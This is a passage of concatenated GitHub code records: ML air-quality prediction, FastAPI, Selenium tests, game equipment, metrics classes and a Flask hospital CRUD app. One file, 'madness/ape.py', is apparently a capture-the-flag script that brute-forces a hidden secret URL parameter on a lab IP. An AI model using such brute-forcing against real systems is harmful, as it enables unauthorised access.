self.guard:\n return True\n if not check:\n return self.bad_measurement\n max_wwt_size = Angle(\"60 deg\")\n c1 = (angular_size < max_wwt_size) \n c2 = (angular_size >= self.galaxy_min_size) \n c3 = (angular_size <= self.galaxy_max_size)\n self.bad_measurement = not (c1 and c2 and c3)\n return c1 and c2 and c3\n \n ","repo_name":"cosmicds/hubbleds","sub_path":"src/hubbleds/components/distance_tool/distance_tool.py","file_name":"distance_tool.py","file_ext":"py","file_size_in_byte":7202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"41925232654","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 9 20:59:05 2021\n\n\n@author: PRAJWAL\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense,Dropout\nfrom sklearn.model_selection import train_test_split\nimport os\nfrom sklearn import svm\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import AdaBoostRegressor\nfrom sklearn.ensemble import RandomForestRegressor\n\ndef predict_weather(list):\n\n dir_path = os.path.dirname(os.path.realpath(__file__))\n print('dir_path --- ', dir_path)\n data = pd.read_csv(dir_path+\"/city_day.csv\")\n\n data = data.dropna(subset=['AQI_Bucket'])\n\n data_a = data[['PM2.5','PM10','NO','NO2','NOx','NH3','CO','SO2','O3','Benzene','Toluene','AQI','AQI_Bucket']]\n\n print(data_a.isna().sum())\n\n #handing missing values\n data_a['PM2.5'] = data_a['PM2.5'].fillna(data_a['PM2.5'].median())\n data_a['PM10'] = data_a['PM10'].fillna(data_a['PM10'].median())\n data_a['NO'] = data_a['NO'].fillna(data_a['NO'].median())\n data_a['NO2'] = data_a['NO2'].fillna(data_a['NO2'].median())\n data_a['NOx'] = data_a['NOx'].fillna(data_a['NOx'].median())\n data_a['NH3'] = data_a['NH3'].fillna(data_a['NH3'].median())\n data_a['CO'] = data_a['CO'].fillna(data_a['CO'].median())\n data_a['SO2'] = data_a['SO2'].fillna(data_a['SO2'].median())\n data_a['O3'] = data_a['O3'].fillna(data_a['O3'].median())\n data_a['Benzene'] = data_a['Benzene'].fillna(data_a['Benzene'].median())\n data_a['Toluene'] = data_a['Toluene'].fillna(data_a['Toluene'].median())\n\n data_a['AQI_Bucket'].value_counts()\n\n data_a['AQI_Bucket'] = data_a['AQI_Bucket'].replace(['Moderate', 'Satisfactory'], 'Good')\n data_a['AQI_Bucket'] = data_a['AQI_Bucket'].replace(['Very Poor', 'Severe'], 'Poor')\n\n data_a['AQI_Bucket'] = data_a['AQI_Bucket'].replace(['Good'],1)\n data_a['AQI_Bucket'] = data_a['AQI_Bucket'].replace(['Poor'],0)\n\n X = data_a.iloc[:,:-1]\n y = data_a.iloc[:,-1]\n print(X)\n print(y)\n #train_test_splitting of data\n #from sklearn.model_selection import train_test_split\n X_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.25,random_state=100)\n\n #SVM training\n model1 = svm.SVC()\n model1.fit(X_train,y_train)\n svm_score=model1.score(X_test,y_test)\n print(svm_score)\n svm_predict = model1.predict(np.array(list).reshape(1,-1))\n print('svm_predict ---', svm_predict)\n if svm_predict== [1]:\n svm_p=\"1\"\n else :\n svm_p=\"0\"\n\n #KNN training\n neigh = KNeighborsClassifier(n_neighbors=3)\n neigh.fit(X_train, y_train)\n\n neigh_score=neigh.score(X_test,y_test)\n print(neigh_score)\n neigh_predict = neigh.predict(np.array(list).reshape(1,-1))\n print('neigh_predict ---', neigh_predict)\n if neigh_predict== [1]:\n neigh_p=\"1\"\n else:\n neigh_p=\"0\"\n #ANN training\n model2 = Sequential()\n model2.add(Dense(12, input_dim=12, activation='relu'))\n 
model2.add(Dropout(0.3))\n model2.add(Dense(8, activation='relu'))\n model2.add(Dense(1, activation='sigmoid'))\n model2.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n model2.fit(X, y, epochs=1, batch_size=10)\n\n print('X_test.iloc[10] ', np.array(X_test.iloc[10]).reshape(1,-1))\n #print('X_test.iloc[10] X_test ', X_test)\n #ann_predict = model2.predict(X_test)\n \n print('list ---', np.array(list).reshape(1,-1))\n ann_predict_accuracy = model2.predict(np.array(list).reshape(1,-1))\n print('ann_predict_accuracy ---', ann_predict_accuracy[0][0])\n print(\"new==\",svm_p)\n print(\"nei==\",neigh_p)\n\n return ann_predict_accuracy[0][0]*100, svm_score*100, neigh_score*100,svm_p,neigh_p\n\n'''\ndef output_results(list):\n list_of_outputs = []\n list_of_outputs.append(model1.predict(np.array(list).reshape(1,-1))\n list_of_outputs.append(neigh.predict(np.array(list).reshape(1,-1))\n list_of_outputs.append(model2.predict(np.array(list).reshape(1,-1))\n print(list_of_outputs)\n return list_of_outputs\n\n'''\n\n\ndef predict_aqi(list):\n # loading dataset and storing in train variable\n dir_path = os.path.dirname(os.path.realpath(__file__))\n print('dir_path --- ', dir_path)\n data = pd.read_csv(dir_path + \"/city_day.csv\")\n\n data = data.dropna(subset=['AQI_Bucket'])\n\n data_a = data[['PM2.5', 'PM10', 'NO2', 'NH3', 'SO2', 'CO', 'O3', 'AQI']]\n\n print(data_a.isna().sum())\n\n # handing missing values\n data_a['PM2.5'] = data_a['PM2.5'].fillna(data_a['PM2.5'].median())\n data_a['PM10'] = data_a['PM10'].fillna(data_a['PM10'].median())\n data_a['NO2'] = data_a['NO2'].fillna(data_a['NO2'].median())\n data_a['NH3'] = data_a['NH3'].fillna(data_a['NH3'].median())\n data_a['SO2'] = data_a['SO2'].fillna(data_a['SO2'].median())\n data_a['CO'] = data_a['CO'].fillna(data_a['CO'].median())\n data_a['O3'] = data_a['O3'].fillna(data_a['O3'].median())\n data_a['AQI'] = data_a['AQI'].fillna(data_a['AQI'].median())\n\n train = data_a\n\n # display top 5 data\n train.head()\n\n # creating model\n m1 = RandomForestRegressor()\n\n # separating class label and other attributes\n train1 = train.drop(['AQI'], axis=1)\n target = train['AQI']\n\n # Fitting the model\n m1.fit(train1, target)\n '''RandomForestRegressor(bootstrap=True, ccp_alpha=0.0, criterion='mse',\n max_depth=None, max_features='auto', max_leaf_nodes=None,\n max_samples=None, min_impurity_decrease=0.0,\n min_impurity_split=None, min_samples_leaf=1,\n min_samples_split=2, min_weight_fraction_leaf=0.0,\n n_estimators=100, n_jobs=None, oob_score=False,\n random_state=None, verbose=0, warm_start=False)'''\n\n # calculating the score and the score is 97.96360799890066%\n m1.score(train1, target) * 100\n\n # predicting the model with other values (testing the data)\n # so AQI is 123.71\n m1.predict([[123, 45, 67, 34, 5, 0, 23]])\n random_forest_aqi = m1.predict(np.array(list).reshape(1, -1))\n print('random_forest_aqi --- ', random_forest_aqi)\n\n '''\n # Adaboost model\n # importing module\n\n # defining model\n m2 = AdaBoostRegressor()\n\n # Fitting the model\n m2.fit(train1, target)\n\n #AdaBoostRegressor(base_estimator=None, learning_rate=1.0, loss='linear', n_estimators=50, random_state=None)\n\n # calculating the score and the score is 96.15377360010211%\n m2.score(train1, target)*100\n\n # predicting the model with other values (testing the data)\n # so AQI is 94.42105263\n ada_aqi = m2.predict(np.array(list).reshape(1,-1))\n print('ada_aqi --- ', ada_aqi)\n '''\n\n return random_forest_aqi\n\n'''\nif __name__ == 
\"__main__\":\n list = [123, 45, 67, 34, 5, 0, 23]\n\n predict_aqi(list)\n'''","repo_name":"perry4455git/aqi_ml_project","sub_path":"air_app/WeatherPrediction.py","file_name":"WeatherPrediction.py","file_ext":"py","file_size_in_byte":6882,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"72949315647","text":"import uvicorn\nfrom fastapi import FastAPI\n\nfrom src.core import config\nfrom src.api.base import router\n\napp = FastAPI(\n title=config.PROJECT_NAME,\n docs_url='/api/openapi',\n openapi_url='/api/openapi.json'\n)\n\napp.include_router(router, prefix='/api')\n\nif __name__ == '__main__':\n uvicorn.run(\n 'main:app',\n host=config.PROJECT_HOST,\n port=config.PROJECT_PORT,\n )\n","repo_name":"BazNick/deposit_calculation","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"27994465177","text":"#!/usr/bin/env python3\n\nimport requests\nimport sys\n\n\nurl = 'http://10.10.170.159/th1s_1s_h1dd3n/?secret='\n\nfor i in range(100):\n r = requests.get(url = url + str(i))\n data = r.text\n\n if 'wrong!' in data:\n print(f\"Secret {i} is wrong\", end=\"\\r\")\n else:\n print(f\"Secret {i} is right!\")\n print(r.text)\n break\n","repo_name":"TimDOtt/thm","sub_path":"madness/ape.py","file_name":"ape.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"712522876","text":"import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\nimport xml.etree.ElementTree as ET\n\nclass ProductCatalogTest(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome()\n self.driver.implicitly_wait(10)\n\n # def tearDown(self):\n # self.driver.quit()\n\n def test_product_search(self):\n product_data = self.retrieve_product_data('../xml/product_data.xml', 'product_search')\n\n # Navigate to the home page\n self.driver.get(\"http://demowebshop.tricentis.com\")\n time.sleep(2)\n\n # Search for a product\n search_input = self.driver.find_element(By.ID, \"small-searchterms\")\n search_input.send_keys(product_data['search_term'])\n time.sleep(1)\n\n search_button = self.driver.find_element(By.CSS_SELECTOR, '[type=\"submit\"][value=\"Search\"]')\n search_button.click()\n time.sleep(2)\n\n # Verify search results\n product_list = self.driver.find_elements(By.CSS_SELECTOR, \".product-item .product-title\")\n self.assertTrue(len(product_list) > 0)\n\n # Select a product\n product_link = product_list[0].find_element(By.TAG_NAME, \"a\")\n product_link.click()\n time.sleep(2)\n\n # Verify product details page\n \n\n def test_product_category_navigation(self):\n category_data = self.retrieve_product_data('../xml/product_data.xml', 'product_category')\n\n # Navigate to the home page\n self.driver.get(\"http://demowebshop.tricentis.com\")\n time.sleep(2)\n\n # Navigate to a product category\n category_link = self.driver.find_element(By.LINK_TEXT, category_data['category'])\n category_link.click()\n time.sleep(2)\n\n\n # Select a product from the category\n product_list = self.driver.find_elements(By.CSS_SELECTOR, \".product-item .product-title\")\n self.assertTrue(len(product_list) > 0)\n\n product_link = product_list[0].find_element(By.TAG_NAME, \"a\")\n product_link.click()\n time.sleep(2)\n\n # Verify product details page\n \n\n def retrieve_product_data(self, 
xml_file, test_type):\n tree = ET.parse(xml_file)\n root = tree.getroot()\n\n data = {}\n for item in root.findall(test_type):\n for element in item:\n data[element.tag] = element.text\n\n return data\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"SolomonBekele/automation_test","sub_path":"selenium/test/programs/product_catalog.py","file_name":"product_catalog.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"944793578","text":"import tcod\nimport json\n\nfrom enum import Enum\n\nfrom components.equippable import Equippable\nfrom entity import Entity\n\nfrom equipment_slots import EquipmentSlots\n\n\n# class WeaponTypes(Enum):\n# DAGGER = 1\n# WARHAMMER = 2\n# SHORT_SWORD = 3\n# LONG_SWORD = 4\n\n\n# class ArmorTypes(Enum):\n# SMALL_SHIELD = 1\n\n\ndef create_weapon(weapon_type, x, y):\n\n # load all equipment data\n with open('data_files/equipment.json') as f:\n equipment = json.load(f)\n\n dagger = equipment['dagger'] \n warhammer = equipment['warhammer']\n short_sword = equipment['short_sword']\n long_sword = equipment['long_sword']\n\n\n if weapon_type == 'dagger':\n slot = getattr(EquipmentSlots, dagger['slot'])\n damage_dice = dagger['damage_dice']\n char = dagger['char']\n color = getattr(tcod, dagger['color'])\n name = dagger['name']\n\n elif weapon_type == 'warhammer':\n slot = getattr(EquipmentSlots, warhammer['slot'])\n damage_dice = warhammer['damage_dice']\n char = warhammer['char']\n color = getattr(tcod, warhammer['color'])\n name = warhammer['name']\n\n elif weapon_type == 'short_sword':\n slot = getattr(EquipmentSlots, short_sword['slot'])\n damage_dice = short_sword['damage_dice']\n char = short_sword['char']\n color = getattr(tcod, short_sword['color'])\n name = short_sword['name']\n\n elif weapon_type == 'long_sword':\n slot = getattr(EquipmentSlots, long_sword['slot'])\n damage_dice = long_sword['damage_dice']\n char = long_sword['char']\n color = getattr(tcod, long_sword['color'])\n name = long_sword['name']\n\n equippable_component = Equippable(\n slot,\n damage_dice=damage_dice\n )\n\n weapon = Entity(\n x, \n y, \n char, \n color, \n name,\n equippable=equippable_component\n )\n\n return weapon","repo_name":"eirinnmorgian/rl-tutorial-extensions","sub_path":"create_equipment.py","file_name":"create_equipment.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"27416529473","text":"import sys\n\ninput = sys.stdin.readline\n\nn, m = map(int, input().strip().split())\n\ndict_m = {}\ndict_r = {}\nfor i in range(1, n+1):\n name = input().strip()\n\n dict_m[name] = i\n dict_r[i] = name\n\nfor j in range(m):\n name = input().strip()\n\n if name.isdigit():\n print(dict_r[int(name)])\n else:\n print(dict_m[name])","repo_name":"Ssuwani/algorithm-study","sub_path":"DataStructure2/1620_나는야포켓몬마스터이다솜.py","file_name":"1620_나는야포켓몬마스터이다솜.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"13285550554","text":"from typing import Collection, List, Tuple\n\nfrom rexmex.metrics.classification import classifications\nfrom rexmex.metrics.coverage import item_coverage, user_coverage\nfrom rexmex.metrics.rating import (\n mean_absolute_error,\n mean_absolute_percentage_error,\n mean_squared_error,\n pearson_correlation_coefficient,\n r2_score,\n 
root_mean_squared_error,\n symmetric_mean_absolute_percentage_error,\n)\nfrom rexmex.utils import binarize, normalize\n\n\nclass MetricSet(dict):\n \"\"\"\n A metric set is a special dictionary that contains metric\n name keys and evaluation metric function values.\n \"\"\"\n\n def filter_metrics(self, filter: Collection[str]):\n \"\"\"\n A method to keep a list of metrics.\n\n Args:\n filter: A list of metric names to keep.\n Returns:\n self: The metric set after the metrics were filtered out.\n \"\"\"\n for name in list(self.keys()):\n if name not in filter:\n del self[name]\n return self\n\n def add_metrics(self, metrics: List[Tuple]):\n \"\"\"\n A method to add metric functions from a list of function names and functions.\n\n Args:\n metrics (List[Tuple]): A list of metric name and metric function tuples.\n Returns:\n self: The metric set after the metrics were added.\n \"\"\"\n for metric in metrics:\n metric_name, metric_function = metric\n self[metric_name] = metric_function\n return self\n\n def __repr__(self):\n \"\"\"\n A representation of the MetricSet object.\n \"\"\"\n return \"MetricSet()\"\n\n def print_metrics(self):\n \"\"\"\n Printing the name of metrics.\n \"\"\"\n print({k for k in self.keys()})\n\n def __add__(self, other_metric_set):\n \"\"\"\n Adding two metric sets together with the addition syntactic sugar operator.\n\n Args:\n other_metric_set (rexmex.metricset.MetricSet): Metric set added from the right.\n Returns:\n new_metric_set (rexmex.metricset.MetricSet): The combined metric set.\n \"\"\"\n new_metric_set = self\n for name, metric in other_metric_set.items():\n new_metric_set[name] = metric\n return new_metric_set\n\n\nclass ClassificationMetricSet(MetricSet):\n \"\"\"\n A set of classification metrics with the following metrics included:\n\n | **Area Under the Receiver Operating Characteristic Curve**\n | **Area Under the Precision Recall Curve**\n | **Average Precision**\n | **F-1 Score**\n | **Matthew's Correlation Coefficient**\n | **Fowlkes-Mallows Index**\n | **Precision**\n | **Recall**\n | **Specificity**\n | **Accuracy**\n | **Balanced Accuracy**\n \"\"\"\n\n def __init__(self):\n super().__init__()\n for func in classifications:\n name = func.__name__\n if name.endswith(\"_score\"):\n name = name[: -len(\"_score\")]\n if func.binarize:\n func = binarize(func)\n self[name] = func\n\n def __repr__(self):\n \"\"\"\n A representation of the ClassificationMetricSet object.\n \"\"\"\n return \"ClassificationMetricSet()\"\n\n\nclass RatingMetricSet(MetricSet):\n \"\"\"\n A set of rating metrics with the following metrics included:\n\n | **Mean Absolute Error**\n | **Mean Squared Error**\n | **Root Mean Squared Error**\n | **Mean Absolute Percentage Error**\n | **Symmetric Mean Absolute Percentage Error**\n | **Coefficient of Determination**\n | **Pearson Correlation Coefficient**\n \"\"\"\n\n def __init__(self):\n self[\"mae\"] = mean_absolute_error\n self[\"mse\"] = mean_squared_error\n self[\"rmse\"] = root_mean_squared_error\n self[\"mape\"] = mean_absolute_percentage_error\n self[\"smape\"] = symmetric_mean_absolute_percentage_error\n self[\"r_squared\"] = r2_score\n self[\"pearson_correlation\"] = pearson_correlation_coefficient\n\n def normalize_metrics(self):\n \"\"\"\n A method to normalize a set of metrics.\n\n Returns:\n self: The metric set after the metrics were normalized.\n \"\"\"\n for name, metric in self.items():\n self[name] = normalize(metric)\n return self\n\n def __repr__(self):\n \"\"\"\n A representation of the RatingMetricSet 
object.\n \"\"\"\n return \"RatingMetricSet()\"\n\n\nclass CoverageMetricSet(MetricSet):\n \"\"\"\n A set of coverage metrics with the following metrics included:\n | **Item Coverage**\n | **User Coverage**\n \"\"\"\n\n def __init__(self):\n self[\"item_coverage\"] = item_coverage\n self[\"user_coverage\"] = user_coverage\n\n def __repr__(self):\n \"\"\"\n A representation of the CoverageMetricSet object.\n \"\"\"\n return \"CoverageMetricSet()\"\n\n\nclass RankingMetricSet(MetricSet):\n \"\"\"\n A set of ranking metrics with the following metrics included:\n\n \"\"\"\n\n def __repr__(self):\n \"\"\"\n A representation of the RankingMetricSet object.\n \"\"\"\n return \"RankingMetricSet()\"\n","repo_name":"AstraZeneca/rexmex","sub_path":"rexmex/metricset.py","file_name":"metricset.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","stars":271,"dataset":"github-code","pt":"42"} +{"seq_id":"10301398974","text":"# factorial\ndef factorial(x):\n if x == 1:\n return 1\n else:\n return x * factorial(x - 1)\n\n\n# #\n# # print(factorial(10))\n#\n# # generator\n#\n# def gen_factorail(x):\n# for i in range(x,0,-1):\n# yield i\n# #\n# # for i in range(10):\n# # print(next(gen))\n#\n# s = 'hellp world'\n# gen = gen_factorail(len(s))\n#\n# for i in range(len(s)):\n# print(s[next(gen)-1])\n\n\nprint(factorial(100))","repo_name":"echosori/Algorithm","sub_path":"Grokking Algorithms/3.递归.py","file_name":"3.递归.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"32427275824","text":"from flask import Flask, render_template,request,redirect,url_for,flash\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\n\napp = Flask(__name__)\napp.secret_key = \"Nivetha\"\napp.config['SQLALCHEMY_DATABASE_URI'] = \"postgresql://postgres:1234@localhost:5432/postgres\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS']= True\ndb = SQLAlchemy(app)\n# migrate = Migrate(app, db)\ndb.init_app(app)\n\nclass patient(db.Model):\n id = db.Column(db.Integer, primary_key = True)\n name = db.Column(db.String(100))\n phone = db.Column(db.String(100))\n disease = db.Column(db.String(100))\n status = db.Column(db.String(100))\n\n def __init__(self,name,phone,disease,status):\n self.name = name\n self.phone = phone\n self.disease = disease\n self.status = status\n\n@app.before_first_request\ndef create_all():\n db.create_all()\n\n@app.route('/')\ndef Index():\n\tall_data = patient.query.all()\n\tall_dat = doctor.query.all()\n\tall_da = employee.query.all()\n\tdata = {'patients':all_data,'doctor':all_dat,'employees':all_da}\n\treturn render_template('index.html',**data)\n\n\n@app.route('/insert', methods = ['POST'])\ndef insert():\n if request.method == 'POST':\n name = request.form['name']\n phone = request.form['phone']\n disease = request.form['disease']\n status = request.form['status']\n\n my_data = patient(name,phone,disease,status)\n db.session.add(my_data)\n db.session.commit()\n\n flash(\"Patient Inserted Successfully!!\")\n\n return redirect(url_for('Index'))\n\n\n@app.route('/update', methods = ['GET','POST'])\ndef update():\n if request.method == 'POST':\n my_data = patient.query.get(request.form.get('id'))\n \n my_data.name = request.form['name']\n my_data.phone = request.form['phone']\n my_data.disease = request.form['disease']\n my_data.status = request.form['status']\n \n db.session.commit()\n flash(\"Patient Updated Successfully\")\n \n return 
redirect(url_for('Index'))\n\n@app.route('/delete//', methods = ['GET', 'POST'])\ndef delete(id):\n my_data = patient.query.get(id)\n db.session.delete(my_data)\n db.session.commit()\n flash(\"Patient Deleted Successfully\")\n \n return redirect(url_for('Index'))\n \nclass doctor(db.Model):\n id = db.Column(db.Integer, primary_key = True)\n name = db.Column(db.String(100))\n phone = db.Column(db.String(100))\n specialist = db.Column(db.String(100))\n\n def __init__(self,name,phone,specialist):\n self.name = name\n self.phone = phone\n self.specialist = specialist\n\n\n@app.route('/insert1', methods = ['POST'])\ndef insert1():\n if request.method == 'POST':\n name = request.form['name']\n phone = request.form['phone']\n specialist = request.form['specialist']\n\n my_data = doctor(name,phone,specialist)\n db.session.add(my_data)\n db.session.commit()\n\n flash(\"Doctor Inserted Successfully!!\")\n\n return redirect(url_for('Index'))\n\n\n@app.route('/update1', methods = ['GET','POST'])\ndef update1():\n if request.method == 'POST':\n my_data = doctor.query.get(request.form.get('id'))\n \n my_data.name = request.form['name']\n my_data.phone = request.form['phone']\n my_data.specialist = request.form['specialist']\n \n db.session.commit()\n flash(\"Doctor Updated Successfully\")\n \n return redirect(url_for('Index'))\n\n@app.route('/delete1//', methods = ['GET', 'POST'])\ndef delete1(id):\n my_data = doctor.query.get(id)\n db.session.delete(my_data)\n db.session.commit()\n flash(\"Doctor Deleted Successfully\")\n \n return redirect(url_for('Index'))\n\n\nclass employee(db.Model):\n id = db.Column(db.Integer, primary_key = True)\n name = db.Column(db.String(100))\n phone = db.Column(db.String(100))\n designation = db.Column(db.String(100))\n\n def __init__(self,name,phone,designation):\n self.name = name\n self.phone = phone\n self.designation = designation\n\n\n@app.route('/insert2', methods = ['POST'])\ndef insert2():\n if request.method == 'POST':\n name = request.form['name']\n phone = request.form['phone']\n designation = request.form['designation']\n\n my_data = employee(name,phone,designation)\n db.session.add(my_data)\n db.session.commit()\n\n flash(\"Employee Inserted Successfully!!\")\n\n return redirect(url_for('Index'))\n\n\n@app.route('/update2', methods = ['GET','POST'])\ndef update2():\n if request.method == 'POST':\n my_data = employee.query.get(request.form.get('id'))\n \n my_data.name = request.form['name']\n my_data.phone = request.form['phone']\n my_data.designation = request.form['designation']\n \n db.session.commit()\n flash(\"Employee Updated Successfully\")\n \n return redirect(url_for('Index'))\n\n@app.route('/delete2//', methods = ['GET', 'POST'])\ndef delete2(id):\n my_data = employee.query.get(id)\n db.session.delete(my_data)\n db.session.commit()\n flash(\"Employee Deleted Successfully\")\n \n return redirect(url_for('Index'))\n\nif __name__ == \"__main__\":\n\tapp.run(debug=True)\n","repo_name":"Nivethithaa-M/Hospital-Management-CRUD-App-in-Flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"71217850047","text":"import dutils.type_check as _type_check\nimport dutils.jupyter_ipython as _jupyter_ipython\nimport torch\nimport torch as _torch\nimport numpy as _np\nfrom typing import List as _List\nimport pandas as _pd\nfrom datetime import datetime as _datetime\nimport ast as _ast\n\n\nclass CategoricalMetrics:\n \"\"\"\n 
This is basically just a namespace with different functions designed to evaluate metrics e.g. accuracy.\n\n INPUTS:\n nc: int --> number of classes\n preds: _torch.Tensor[int64 * nc] --> contain predictions. All values must be within [0, 1, ..., nc-1]\n gt: _torch.Tensor[int64 * nc] --> contain ground truth labels. All values must be within [0, 1, ..., nc-1]\n cfm: _np.ndarray[[int32 * nc] * nc] or None --> Confusion matrix between `gt` (rows) and `preds` (columns). If `cfm=None`, the confusion matrix will be calculated automatically\n\n NOTE:\n I would like to have all pytorch functionality in a single file, but would also like to be able to browse different metrcis with autocomplete.\n Hence, why I made this into a class instead of ordinary functions / a seperate module.\n \"\"\"\n\n def __init__(self):\n self.num_decimal = 5\n\n def _check_and_copy_input(self, preds: _torch.Tensor, gt: _torch.Tensor, nc: int, cfm: _np.ndarray = None):\n # Type checks\n _type_check.assert_types([preds, gt, nc, cfm], [_torch.Tensor, _torch.Tensor, int, _np.ndarray],\n [False, False, False, True])\n assert preds.dtype == _torch.int64, f\"Expected predictions to be af int64 (long), but recieved `preds.dtype={preds.dtype}`\"\n assert gt.dtype == _torch.int64, f\"Expected ground truth labels to be af int64 (long), but recieved `preds.dtype={gt.dtype}`\"\n\n # Value checks\n assert nc > 1, f\"Expected at least 2 classes, but received `{nc}`\"\n assert len(preds.shape) == 1, f\"Expected predictions to be of shape 'batch_size', but received `preds.shape={preds.shape}`\"\n assert len(gt.shape) == 1, f\"Expected ground truth labels to be of shape 'batch_size', but received `gt.shape={gt.shape}`\"\n assert gt.shape == preds.shape, \"Shape mismatch between the ground truth labels and the received predictions\"\n assert (gt.max() < nc) and (gt.min() >= 0), \"At least one of the ground truth values are invalid\"\n assert (preds.max() < nc) and (preds.min() >= 0), \"At least one prediction values are is invalid\"\n\n # Confusion matrix\n if cfm is not None:\n assert cfm.shape == (nc, nc), f\"Expected the confusion matrix to be of shape `({nc, nc})`, but received `({cfm.shape})`\"\n assert cfm.dtype == _np.int32, f\"Expected cfm to have dtype int32, but received `cfm.dtype={cfm.dtype}`\"\n cfm = cfm.copy()\n\n # Prepare tensors for metric calculations\n preds = preds.clone().detach().cpu().float()\n gt = gt.clone().detach().cpu().float()\n return preds, gt, cfm\n\n def acc(self, preds: _torch.Tensor, gt: _torch.Tensor, nc: int):\n preds, gt, _ = self._check_and_copy_input(preds, gt, nc, None)\n if nc != 2: raise NotImplementedError(\"Multiclass accuracy is not well defined, use recall instead.\")\n\n acc = (preds == gt).float().mean().item() # TODO: check implementation is correct\n return acc\n\n def precision(self, preds: _torch.Tensor, gt: _torch.Tensor, nc: int, cfm: _np.ndarray = None):\n # Setup\n if cfm is None: cfm = self.confusion_matrix(preds, gt, nc)\n preds, gt, cfm = self._check_and_copy_input(preds, gt, nc, cfm)\n\n # Precision calculation\n TP = cfm.diagonal()\n TP_plus_FP = cfm.sum(0)\n precision_per_class = TP / (TP_plus_FP + 1e-12)\n precision_per_class = precision_per_class.round(self.num_decimal)\n\n return {\"precision_class\": precision_per_class.tolist(),\n \"precision_avg_micro\": round(TP.sum() / TP_plus_FP.sum(), self.num_decimal),\n \"precision_avg_macro\": round(precision_per_class.mean(), self.num_decimal)}\n\n def recall(self, preds: _torch.Tensor, gt: _torch.Tensor, nc: int, cfm: 
_np.ndarray = None):\n # Setup\n if cfm is None: cfm = self.confusion_matrix(preds, gt, nc)\n preds, gt, cfm = self._check_and_copy_input(preds, gt, nc, cfm)\n\n # Recall calculation\n TP = cfm.diagonal()\n TP_plus_FN = cfm.sum(1)\n recall_per_class = TP / (TP_plus_FN + 1e-12)\n recall_per_class = recall_per_class.round(self.num_decimal)\n\n return {\"recall_class\": recall_per_class.tolist(),\n \"recall_avg_micro\": round(TP.sum() / TP_plus_FN.sum(), self.num_decimal),\n \"recall_avg_macro\": round(recall_per_class.mean(), self.num_decimal)}\n\n def f1_score(self, preds: _torch.Tensor, gt: _torch.Tensor, nc: int, cfm: _np.ndarray = None):\n # Setup\n if cfm is None: cfm = self.confusion_matrix(preds, gt, nc)\n preds, gt, cfm = self._check_and_copy_input(preds, gt, nc, cfm)\n\n # F1 score calculation (macro)\n precision = _np.array(self.precision(preds.long(), gt.long(), nc, cfm)[\"precision_class\"])\n recall = _np.array(self.recall(preds.long(), gt.long(), nc, cfm)[\"recall_class\"])\n f1_per_class = (2 * precision * recall) / (precision + recall + 1e-12)\n f1_per_class = f1_per_class.round(self.num_decimal)\n\n # F1 score calculation (micro)\n # So to make a long story short \"f1=precision=recall\" is true in multiclass setups with micro averging.\n # The reason for this is essentailly that FP=FN ==> precision = recall.\n # This was kinda wierd to me at first, but in a multiclass setup all the elements in a conf. matrix is both FP and FN simulationously i.e. a wrong prediction in one class will always be missing in another\n # So I have just calculated the precision ones to avoid unnecessary computations\n TP = cfm.diagonal().sum()\n FP = cfm.sum(0).sum() - TP # == cfm.sum(1).sum() - TP\n f1_avg_micro = round((TP / (TP + FP)).mean(), self.num_decimal)\n\n return {\"f1_class\": f1_per_class.tolist(),\n \"f1_avg_micro\": round(f1_avg_micro, self.num_decimal),\n \"f1_avg_macro\": round(f1_per_class.mean(), self.num_decimal)}\n\n def class_balance(self, preds: _torch.Tensor, gt: _torch.Tensor, nc: int, label_names: _List[str],\n plot_class_dist: bool = False):\n # _np.unique(labels.numpy(), return_counts=True)\n # plot_class_dist\n # translate numbers to names\n raise NotImplementedError(\"\")\n\n def confusion_matrix(self, preds: _torch.Tensor, gt: _torch.Tensor, nc: int):\n preds, gt, _ = self._check_and_copy_input(preds, gt, nc, None)\n cfm = _np.zeros((nc, nc))\n for p, l in zip(preds.long(), gt.long()):\n cfm[l, p] += 1\n return cfm.astype(int)\n\n\npytorch_metrics = CategoricalMetrics()\n\n\nclass CategoricalLogger:\n \"\"\"\n\n\n # EXAMPLE (1)\n >> logger = CategoricalLogger(1000, 3)\n >> for epoch in range(5):\n >> logger.update(epoch, _torch.randint(0, 3, (10000,)).long(), _torch.randint(0, 3, (10000,)).long())\n >> print(logger)\n >> logger.get_overall_average()\n \n \n # EXAMPLE (2)\n >> logger = CategoricalLogger(10, 3)\n >> for epoch in range(5):\n >> logger.update(epoch, _torch.randint(0, 3, (100,)).long(), _torch.randint(0, 3, (100,)).long(),\n >> _torch.rand(1)[0], _torch.rand(1)[0])\n >> 